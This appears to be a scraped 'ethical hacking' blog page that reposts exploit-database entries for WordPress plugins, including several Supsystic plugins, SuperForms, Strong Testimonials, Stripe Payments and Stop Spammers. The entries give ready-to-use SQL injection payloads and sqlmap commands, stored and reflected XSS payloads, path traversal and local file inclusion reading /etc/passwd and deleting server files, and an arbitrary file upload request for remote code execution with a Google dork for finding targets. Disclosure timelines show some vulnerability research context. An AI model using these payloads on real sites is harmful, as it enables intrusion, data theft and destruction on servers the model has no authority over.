# Exploit Title: WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection
# Date: 24/07 2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/newsletter-by-supsystic.1.5.5.zip
# Category: Web Application
# Version: 1.5.5
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 01/12 2020: Plugin/Project closed by WordPress Security team
# 1. Description
The GET parameter "sidx" does not sanitize user input when searching for existing subscribers.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for existing subscribers and save it to request.txt.
Referer: http://192.168.0.49/wp-admin/admin.php?page=newsletters-supsystic&tab=subscribers
sqlmap -r request.txt --dbms=mysql -p sidx
Parameter: sidx (GET)
Type: time-based blind
Payload: mod=subscribers&action=getListForTbl&pl=nbs&reqType=ajax&search[text_like]=testing&search[search_list]=0&_search=false&nd=1595780014444&rows=25&page=0&sidx=id AND (SELECT 1511 FROM (SELECT(SLEEP(5)))gTHi)&sord=desc
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863131855
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection
# Date: 09/08/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/membership-by-supsystic.1.4.7.zip
# Version: 1.4.7
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 22/12 2020: Vulnerability fixed
# 1. Description
The GET parameters "search" and "sidx" does not sanitize user input when searching for badges.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index
sqlmap -r request.txt --dbms=mysql -p search
Parameter: search (GET)
Type: time-based blind
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND 'trjK'='trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
Type: UNION query
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL-- -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
# Exploit Title: WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/digital-publications-by-supsystic.1.6.9.zip
# Version: 1.6.9
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 20/12 2020: Vulnerability fixed
##################################
Path Traversal and DoS
##################################
# 1. Description
The "Folder" tab under "Publications" is vulnerable to path traversal and exposes information not stored on the web server. The user can gain information regarding images stored in, for example, home directories. The vulnerable code is in the utils.php file, which uses readdir().
# 2. Proof of Concept (PoC)
Enter the payload into the "Folder" input field:
../../../../../../../../../home/erik
However, if the web server attempts to open a folder without read access, the function will run in an infinite loop. For example:
../../../../../../../../../root
The web server will execute the code in an infinite loop and store massive amounts of data in the error.log file until the hard drive is full. The import Folder feature does not work anymore after trying to open directories without read permission when using path traversal techniques. Apache error.log file output:
[Fri Jul 24 20:45:43.739704 2020] [:error] [pid 3516] [client 192.168.0.51:47892] PHP Warning: readdir() expects parameter 1 to be resource, boolean given in /var/www/wordpress/wp-content/plugins/digital-publications-by-supsystic/classes/utils.php on line 137, referer: http://192.168.0.49/wp-admin/term.php?taxonomy=dps_book&tag_ID=16&post_type=post&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Ddps_book
##################################
Stored XSS
##################################
# 1. Description
When adding a new publication under the section "Publications", all values such as Area Width, Publication Width and so on are vulnerable to stored XSS. It is possible to store code in all input fields as the code does not sanitize any user input.
# 2. Proof of Concept (PoC)
Enter the following payload into any input field: "><script>alert(1)</script><!--'
The payload is stored in the publication details and will be executed whenever the user views the "Publications" page or edits a publication.
# Exploit Title: WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/data-tables-generator-by-supsystic.1.9.96.zip
# Category: Web Application
# Version: 1.9.96
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 08/12 2020: Vulnerability fixed
##################################
SQLi
##################################
# 1. Description
The POST parameter "data[search][text_like]" does not sanitize user input when searching for data.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables
sqlmap -r request.txt --dbms=mysql -p data[search][text_like]
Parameter: data[search][text_like] (POST)
Type: time-based blind
Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' AND (SELECT 4736 FROM (SELECT(SLEEP(5)))iAJy) AND 'iAVl'='iAVl&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
Type: UNION query
Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' UNION ALL SELECT CONCAT(0x7170707871,0x487a436e5175474a64617446465349535248737249775445424671545a557367704b61424e6d6545,0x7178786b71),NULL-- -&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
##################################
Stored XSS
##################################
# 1. Description
The "Editor" tab under the "Tables" section is vulnerable to stored XSS. It is possible to store XSS in all input fields as the code does not sanitize any of the user input.
# 2. Proof of Concept (PoC)
Enter the following payload into any input field: "><script>alert(1)</script><!--'
The payload is stored in the document and executes whenever a user visits the "Settings" tab or the document itself.
The document is also cached by the plugin. Therefore, the payload can also be executed by any unauthenticated user visting http://192.168.0.49/wp-content/uploads/supsystic-tables/cache/tables/[YOUR TABLE NUMBER]
# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-by-supsystic.1.7.5.zip
# Version: 1.7.5
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 10/12 2020: Vulnerability fixed
##################################
SQLi
##################################
# 1. Description
The GET parameter "sidx" does not sanitize user input when searching for existing contact forms.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for existing contact forms and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic
sqlmap -r request.txt --dbms=mysql -p sidx --level=5
Parameter: sidx (GET)
Type: boolean-based blind
Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=(SELECT (CASE WHEN (9602=9602) THEN 0x6964 ELSE (SELECT 9695 UNION SELECT 1181) END))&sord=desc
Type: time-based blind
Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=id AND (SELECT 4102 FROM (SELECT(SLEEP(5)))vOKL)&sord=desc
##################################
Stored XSS
##################################
# 1. Description
The "Edit name" and "Contact information" features are vulnerable to stored XXS.
Location: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms_edit&id=[FORM ID]
# 2. Proof of Concept (PoC)
Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
The payload will execute when viewing the "Show All Forms" section.
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms
# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)
# Date: 10/27/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://supsystic.com/
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.18
# Tested on : Windows 10
#Poc:
1. Install Latest WordPress
2. Install and activate plugin.
3. Open plugin, click "Add New Form" and select any form.
4. Click "Fields" tab and "Add New Field". Choose whatever you want.
5. Inject JavaScript payload which is mentioned below into 'label' field, save and alert will appear on the screen.
Payload : <img src=x onerror=alert(1)>
# Exploit Title: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-by-supsystic.zip
# Version: 2.3.9
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply.
# 29/11 2020: WordPress Plugin Security team contacted
# 01/12 2020: Plugin/Project closed by WordPress Security team
# 1. Description
Changing the path when downloading the stored backup allows an attacker to both read and delete internal system files (LFI).
# 2. Proof of Concept (PoC)
Create a backup. When downloading the backup, change its path:
GET http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd
The "Delete" tab also allows an attacker to delete files on the server:
POST http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog
Payload: reqType=ajax&page=backup&action=removeAction&filename=[FILE PATH]&deleteLog=1&pl=bup
# Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://schiocco.com/
# Software Link : https://board.support/
# Software : Support Board - Chat And Help Desk
# Version : v1.2.3
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : N/A
# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress,
# a Stored XSS vulnerability has been discovered in file upload areas in the
# Chat and Help Desk sections via the msg parameter
# in a /wp-admin/admin-ajax.php sb_ajax_add_message action.
# HTTP POST Request : [Stored XSS]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/chat/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 450
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
# In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin,
# the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and
# file upload areas in the Chat and Help Desk sections of Schiocco.
# HTTP POST Request : [HTML Injection]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/desk-demo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)
# data in http request :
POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
<=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"
8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"
0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";
filename="filename.(extension)" <==== inject code extension (.php4)
for example
Content-Type: application/pdf
Evil codes to be uploaded
-----------------------------423513681827540048931513055996--
# Uploaded Malicious File can be Found in :
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply .
# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting
# Date: 2020-01-23
# Vendor Homepage: https://strongtestimonials.com
# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 2.40.0 and below
# CVE : CVE-2020-8549
# 1. Description
# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with
# over 90,000 active installations. In the client details section which is seen when adding
# or editing a testimonial, the custom[client_name] and custom[company_name] parameters
# were found to be vulnerable to stored cross-site scripting. All WordPress websites
# using Strong Testimonials version 2.40.0 and below are affected.
2. Proof of Concept
When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed.
The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page.
POST /wp-admin/post.php HTTP/1.1
Host: testing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1402
Origin: http://testing.com
Connection: close
Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg
Upgrade-Insecure-Requests: 1
_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator
3. Timeline
Vulnerability reported to the Strong Testimonials team – January 23, 2020
Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020
# Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
# Date: 04-01-2021
# Software Link: https://wordpress.org/plugins/stripe-payments/#developers
# Exploit Author: Park Won Seok
# Contact: kkigg39@gmail.com
# Category: Webapps
# Version: stripe-payments (Ver_2.0.39)
# Tested on: Windows 10 x64
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver_2.0.39)
# Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting.
# POC - Stored Cross-Site Scripting
POST /wp-admin/options.php HTTP/1.1
Host: localhost
Content-Length: 5786
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:// localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
http://192.168.31.131/wp-admin/edit.php?post_type=asp-products&page=stripe-payments-settings
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie:
wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7C50b0c8ba4dcc6dfdd756418c9fc960d3736f93a0febf165408110ea815dbab03;
wordpress_test_cookie=WP%20Cookie%20check;
wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7Cb3e517e751d2519dc5473f911230fe31c966c9c755f193344b4bdea80a09d8b4;
asp_transient_id=36985e31f4be2b5ae0e14586c592c87d;
wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist;
wp-settings-time-1=1608903490
Connection: close
wp-asp-urlHash=general&option_page=AcceptStripePayments-settings-group&action=update&_wpnonce=eee296fed3&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings&AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fstripe-checkout-result%2F&asp_products_page_url_value=http%3A%2F%2F192.168.31.131%2Fproducts%2F&
*AcceptStripePayments-settings%5Bcurrency_code%5D=USDjk9v0%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3edr45t*
&AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=&AcceptStripePayments-settings%5Bpopup_default_country%5D=0&AcceptStripePayments-settings%5Bapi_publishable_key%5D=1&AcceptStripePayments-settings%5Bapi_secret_key%5D=2&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=3&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=4&AcceptStripePayments-settings%5Bbuyer_email_type%5D=text&AcceptStripePayments-settings%5Bfrom_email_address%5D=test+%3Csales%
40your-domain.com
%3E&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+the+purchase&AcceptStripePayments-settings%5Bbuyer_email_body%5D=Hello%0D%0A%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28s%29%3A%0D%0A%0D%0A%7Bproduct_details%7D&AcceptStripePayments-settings%5Bseller_notification_email%5D=localhost%
40google.com <http://40naver.com/>
&AcceptStripePayments-settings%5Bseller_email_type%5D=text&AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+Seller%0D%0A%0D%0AThis+mail+is+to+notify+you+of+a+product+sale.%0D%0A%0D%0A%7Bproduct_details%7D%0D%0A%0D%0AThe+sale+was+made+to+%7Bpayer_email%7D%0D%0A%0D%0AThanks&AcceptStripePayments-settings%5Bsend_email_on_error_to%5D=localhost%
40google.com <http://40naver.com/>
&AcceptStripePayments-settings%5Bprice_currency_pos%5D=left&AcceptStripePayments-settings%5Bprice_decimal_sep%5D=.&AcceptStripePayments-settings%5Bprice_thousand_sep%5D=%2C&AcceptStripePayments-settings%5Bprice_decimals_num%5D=2&AcceptStripePayments-settings%5Bcustom_field_name%5D=&AcceptStripePayments-settings%5Bcustom_field_descr%5D=&AcceptStripePayments-settings%5Bcustom_field_descr_location%5D=placeholder&AcceptStripePayments-settings%5Bcustom_field_position%5D=above&AcceptStripePayments-settings%5Bcustom_field_type%5D=text&AcceptStripePayments-settings%5Bcustom_field_validation%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_regex%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_err_msg%5D=Please+enter+valid+data&AcceptStripePayments-settings%5Btos_text%5D=I+accept+the+%3Ca+href%3D%22https%3A%2F%2Fexample.com%2Fterms-and-conditions%2F%22+target%3D%22_blank%22%3ETerms+and+Conditions%3C%2Fa%3E&AcceptStripePayments-settings%5Btos_position%5D=above&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUSD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEUR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BGBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BAUD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BARS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBAM%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBGN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBRL%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCAD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCLP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCNY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCOP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCZK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BDKK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEGP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHKD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHUF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BINR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BIDR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BILS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BJPY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BLBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMYR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMXN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNZD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNOK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPEN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPHP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPLN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRON%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRUB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSGD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BZAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BKRW%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSEK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCHF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTWD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTHB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTRY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUYU%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BVND%5D=1&AcceptStripePayments-settings%5Bpp_additional_css%5D=&AcceptStripePayments-settings%5Brecaptcha_site_key%5D=&AcceptStripePayments-settings%5Brecaptcha_secret_key%5D=&submit=Save+Changes
# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
# Date: 04/08/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
# Version: <= 2021.8
# Tested on: Windows-Ubuntu
# CVE : CVE-2021-24245
Summary:
Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript
Proof of concepts:
1-Install "Stop Spammers <= 2021.8" in your wordpress website
2-For testing remove your IP address from the allowed list
3-Go to http://<YOUR-WEBSITE>/wp-admin
4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "
#Notice the `ad` keyword must be in your payload!
5-Press Alt + Shift + X to trigger Xss
#Tested on Firefox
Request POC:
POST /wp-login.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 161
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check;
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
